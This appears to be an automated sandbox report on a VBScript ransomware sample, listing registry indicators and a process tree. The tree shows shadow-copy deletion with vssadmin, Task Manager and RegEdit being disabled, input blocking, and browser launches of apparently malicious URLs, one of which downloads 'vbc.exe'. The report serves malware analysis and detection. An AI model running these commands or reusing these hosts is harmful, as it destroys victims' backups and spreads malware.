c4ec85d1f76b660c94564e39ed5ccd0e3168fd8a4337393a2b413177a92223ffa56bbeaa8dbc9b2a5faa0d5e71d42000208e4e34c48d02b007eb9d2fede53302ed5b8b4b3adb84808d65825d8c96bc71790efb30181e774d06729ee46a94c65d0175054c0deebd73ad420f0d5f10dd04d563f6a5238370e27560b3ab141fb8ced63b03d9cec985f5a82459a7fc113b9e30e7e50941fdd46ad157344650db5c193234456f699b8df607d4ed64e15c5af6863f720a49f810781304deb7fce4c866fa86d65baf374176ed824b4f1fe3162e3dce0f37c21c74e80b9c55d239d6cef68f3378abe7243687c672b1c08c959cfe671d3629fd07e6581facbeb9003bb77f203e40e318fb31e1f931312884dfe4d04250be6f20b3b779295e3080e0dac446afd6505eb8933796a60987b0349eb4f40475430d4668b4f99fb8ac596441d0acd0bd7584f3927b768a88992b8f43192f1b6a0270cd654b9575b3d58fa12e3d003fe0e6540dd98604b81421583b829eacbcf480e29fddbf4fe0804734b75f9ec6fe663f457a257e79f2377acfcd7c5b7ba5f60c2df053248b2d5dd73666093b3f375be754558474eb0bc174dadbcb8d81f4fca910aa61887e88f9ad55d56a39a9a09af5b17a0b8052fc8c25c0304466101ac0b8182bcb623fe36564fcaa9dd0c1ad911b84dd808aa2eed4dc3e62427e4e925cd8d7cbed562f6a0144bba93ec8416fd246fd2ec2d652e099400000003bb7ab3e808bec9e4a1e77f267c408c9fcb8ae7dd1c52f5f1764d93c2453e7a7ec679dcc4cc71a4cb7db4f6a933797d2de15de883c12a5ddb786f03f4d7e40b0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Mouse	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Mouse\SwapMouseButtons = "1"	wscript.exe

Opens file in notepad (likely ransom note) 11 IoCs

ransomware

pid	Process
5612	notepad.exe
6300	notepad.exe
7596	notepad.exe
2976	notepad.exe
12068	notepad.exe
12616	notepad.exe
8588	notepad.exe
3008	notepad.exe
7480	notepad.exe
10076	notepad.exe
13184	notepad.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	5	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2372	iexplore.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeBackupPrivilege	2804	vssvc.exe
Token: SeRestorePrivilege	2804	vssvc.exe
Token: SeAuditPrivilege	2804	vssvc.exe
Token: SeDebugPrivilege	1080	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1912	iexplore.exe
1640	iexplore.exe
1912	iexplore.exe
1640	iexplore.exe
1628	iexplore.exe
1628	iexplore.exe
992	iexplore.exe
992	iexplore.exe
2628	iexplore.exe
2628	iexplore.exe
2012	iexplore.exe
2012	iexplore.exe
696	iexplore.exe
696	iexplore.exe
2132	iexplore.exe
2132	iexplore.exe
2900	iexplore.exe
2900	iexplore.exe
1580	iexplore.exe
1912	iexplore.exe
1580	iexplore.exe
1912	iexplore.exe
1912	iexplore.exe
1912	iexplore.exe
1912	iexplore.exe
1912	iexplore.exe
2012	iexplore.exe
2012	iexplore.exe
2012	iexplore.exe
2012	iexplore.exe
2012	iexplore.exe
2012	iexplore.exe
1680	iexplore.exe
1680	iexplore.exe
2344	iexplore.exe
2344	iexplore.exe
2900	iexplore.exe
2900	iexplore.exe
2900	iexplore.exe
2900	iexplore.exe
2388	iexplore.exe
2388	iexplore.exe
2900	iexplore.exe
2900	iexplore.exe
696	iexplore.exe
696	iexplore.exe
2960	iexplore.exe
2960	iexplore.exe
696	iexplore.exe
696	iexplore.exe
2132	iexplore.exe
2132	iexplore.exe
2132	iexplore.exe
2132	iexplore.exe
2628	iexplore.exe
2628	iexplore.exe
2628	iexplore.exe
2628	iexplore.exe
2132	iexplore.exe
2132	iexplore.exe
696	iexplore.exe
2628	iexplore.exe
2132	iexplore.exe
696	iexplore.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
2260	mspaint.exe
1648	mspaint.exe
1844	mspaint.exe
1664	mspaint.exe
1540	mspaint.exe
1724	mspaint.exe
1640	iexplore.exe
1640	iexplore.exe
1912	iexplore.exe
1912	iexplore.exe
2396	iexplore.exe
2396	iexplore.exe
1680	iexplore.exe
1680	iexplore.exe
2088	iexplore.exe
2088	iexplore.exe
1664	mspaint.exe
2372	iexplore.exe
2372	iexplore.exe
2276	iexplore.exe
992	iexplore.exe
992	iexplore.exe
2276	iexplore.exe
316	iexplore.exe
316	iexplore.exe
2388	iexplore.exe
2388	iexplore.exe
2012	iexplore.exe
2012	iexplore.exe
2628	iexplore.exe
2628	iexplore.exe
1844	mspaint.exe
1724	mspaint.exe
2132	iexplore.exe
2132	iexplore.exe
1160	iexplore.exe
1160	iexplore.exe
2344	iexplore.exe
2344	iexplore.exe
1540	mspaint.exe
2960	iexplore.exe
696	iexplore.exe
2960	iexplore.exe
696	iexplore.exe
1580	iexplore.exe
1580	iexplore.exe
1664	mspaint.exe
1724	mspaint.exe
1844	mspaint.exe
2708	iexplore.exe
1664	mspaint.exe
1724	mspaint.exe
1844	mspaint.exe
2708	iexplore.exe
1648	mspaint.exe
2260	mspaint.exe
2900	iexplore.exe
2900	iexplore.exe
1628	iexplore.exe
1628	iexplore.exe
2752	iexplore.exe
280	iexplore.exe
280	iexplore.exe
2752	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2052 wrote to memory of 804	2052	WScript.exe	30
PID 2052 wrote to memory of 804	2052	WScript.exe	30
PID 2052 wrote to memory of 804	2052	WScript.exe	30
PID 804 wrote to memory of 2944	804	wscript.exe	31
PID 804 wrote to memory of 2944	804	wscript.exe	31
PID 804 wrote to memory of 2944	804	wscript.exe	31
PID 2944 wrote to memory of 3000	2944	cmd.exe	33
PID 2944 wrote to memory of 3000	2944	cmd.exe	33
PID 2944 wrote to memory of 3000	2944	cmd.exe	33
PID 804 wrote to memory of 2824	804	wscript.exe	36
PID 804 wrote to memory of 2824	804	wscript.exe	36
PID 804 wrote to memory of 2824	804	wscript.exe	36
PID 804 wrote to memory of 3008	804	wscript.exe	37
PID 804 wrote to memory of 3008	804	wscript.exe	37
PID 804 wrote to memory of 3008	804	wscript.exe	37
PID 804 wrote to memory of 2648	804	wscript.exe	39
PID 804 wrote to memory of 2648	804	wscript.exe	39
PID 804 wrote to memory of 2648	804	wscript.exe	39
PID 804 wrote to memory of 2452	804	wscript.exe	40
PID 804 wrote to memory of 2452	804	wscript.exe	40
PID 804 wrote to memory of 2452	804	wscript.exe	40
PID 804 wrote to memory of 3024	804	wscript.exe	41
PID 804 wrote to memory of 3024	804	wscript.exe	41
PID 804 wrote to memory of 3024	804	wscript.exe	41
PID 804 wrote to memory of 1860	804	wscript.exe	42
PID 804 wrote to memory of 1860	804	wscript.exe	42
PID 804 wrote to memory of 1860	804	wscript.exe	42
PID 804 wrote to memory of 1080	804	wscript.exe	44
PID 804 wrote to memory of 1080	804	wscript.exe	44
PID 804 wrote to memory of 1080	804	wscript.exe	44
PID 1860 wrote to memory of 2260	1860	cmd.exe	46
PID 1860 wrote to memory of 2260	1860	cmd.exe	46
PID 1860 wrote to memory of 2260	1860	cmd.exe	46
PID 1860 wrote to memory of 1912	1860	cmd.exe	47
PID 1860 wrote to memory of 1912	1860	cmd.exe	47
PID 1860 wrote to memory of 1912	1860	cmd.exe	47
PID 1860 wrote to memory of 1640	1860	cmd.exe	49
PID 1860 wrote to memory of 1640	1860	cmd.exe	49
PID 1860 wrote to memory of 1640	1860	cmd.exe	49
PID 1860 wrote to memory of 2516	1860	cmd.exe	50
PID 1860 wrote to memory of 2516	1860	cmd.exe	50
PID 1860 wrote to memory of 2516	1860	cmd.exe	50
PID 1860 wrote to memory of 2628	1860	cmd.exe	51
PID 1860 wrote to memory of 2628	1860	cmd.exe	51
PID 1860 wrote to memory of 2628	1860	cmd.exe	51
PID 1860 wrote to memory of 2396	1860	cmd.exe	52
PID 1860 wrote to memory of 2396	1860	cmd.exe	52
PID 1860 wrote to memory of 2396	1860	cmd.exe	52
PID 1860 wrote to memory of 1680	1860	cmd.exe	53
PID 1860 wrote to memory of 1680	1860	cmd.exe	53
PID 1860 wrote to memory of 1680	1860	cmd.exe	53
PID 1860 wrote to memory of 1648	1860	cmd.exe	54
PID 1860 wrote to memory of 1648	1860	cmd.exe	54
PID 1860 wrote to memory of 1648	1860	cmd.exe	54
PID 1860 wrote to memory of 2012	1860	cmd.exe	55
PID 1860 wrote to memory of 2012	1860	cmd.exe	55
PID 1860 wrote to memory of 2012	1860	cmd.exe	55
PID 1860 wrote to memory of 2276	1860	cmd.exe	56
PID 1860 wrote to memory of 2276	1860	cmd.exe	56
PID 1860 wrote to memory of 2276	1860	cmd.exe	56
PID 1860 wrote to memory of 1568	1860	cmd.exe	57
PID 1860 wrote to memory of 1568	1860	cmd.exe	57
PID 1860 wrote to memory of 1568	1860	cmd.exe	57
PID 1860 wrote to memory of 2752	1860	cmd.exe	58

System policy modification 1 TTPs 5 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu = "1"	wscript.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LCRYPT0R\LCrypt0rX.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2052
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\LCRYPT0R\LCrypt0rX.vbs" /elevated
  2⤵
  - Blocklisted process makes network request
  - Disables RegEdit via registry modification
  - Adds Run key to start application
  - Drops file in System32 directory
  - Sets desktop wallpaper using registry
  - Modifies Control Panel
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:804
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:3000
- - C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" USER32.DLL,SwapMouseButton
    3⤵
    PID:2824
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\READMEPLEASE.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:3008
- - C:\Windows\System32\RUNDLL32.EXE
    "C:\Windows\System32\RUNDLL32.EXE" user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2648
- - C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" user32.dll,BlockInput True
    3⤵
    PID:2452
- - C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" user32.dll,BlockInput True
    3⤵
    PID:3024
- - C:\Windows\System32\cmd.exe
    cmd /c ""C:\Windows\System32\iamthedoom.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1860
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:2260
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2260 -s 496
        5⤵
        
        PID:6800
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer Phishing Filter
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1912
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1912 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:800
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1640
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1640 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2040
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2516
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2628
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2628 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3936
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2396
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2396 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3028
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1680
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1680 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3336
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:1648
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1648 -s 500
        5⤵
        
        PID:12660
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2012
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2012 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3944
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2276
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2276 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3676
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:1568
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2752
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2752 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4152
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2960
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2960 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2044
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:316
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:316 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3716
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:1844
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1844 -s 496
        5⤵
        
        PID:10360
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1580
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1580 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1632
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2708
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2708 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2052
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:448
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      PID:1652
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1652 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4176
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2132
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2132 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4056
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:280
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:280 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4184
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:1664
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1664 -s 500
        5⤵
        
        PID:12596
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      PID:3012
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3012 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4316
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2344
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2344 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4072
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2060
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1628
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1628 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1880
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1160
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1160 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4040
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2388
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2388 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3836
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:1540
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1540 -s 492
        5⤵
        
        PID:11596
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2900
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2900 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4052
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      PID:2820
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2820 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4144
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:1728
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:992
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:992 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3704
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:696
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:696 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3036
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      PID:2552
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4308
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:1724
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1724 -s 496
        5⤵
        
        PID:10744
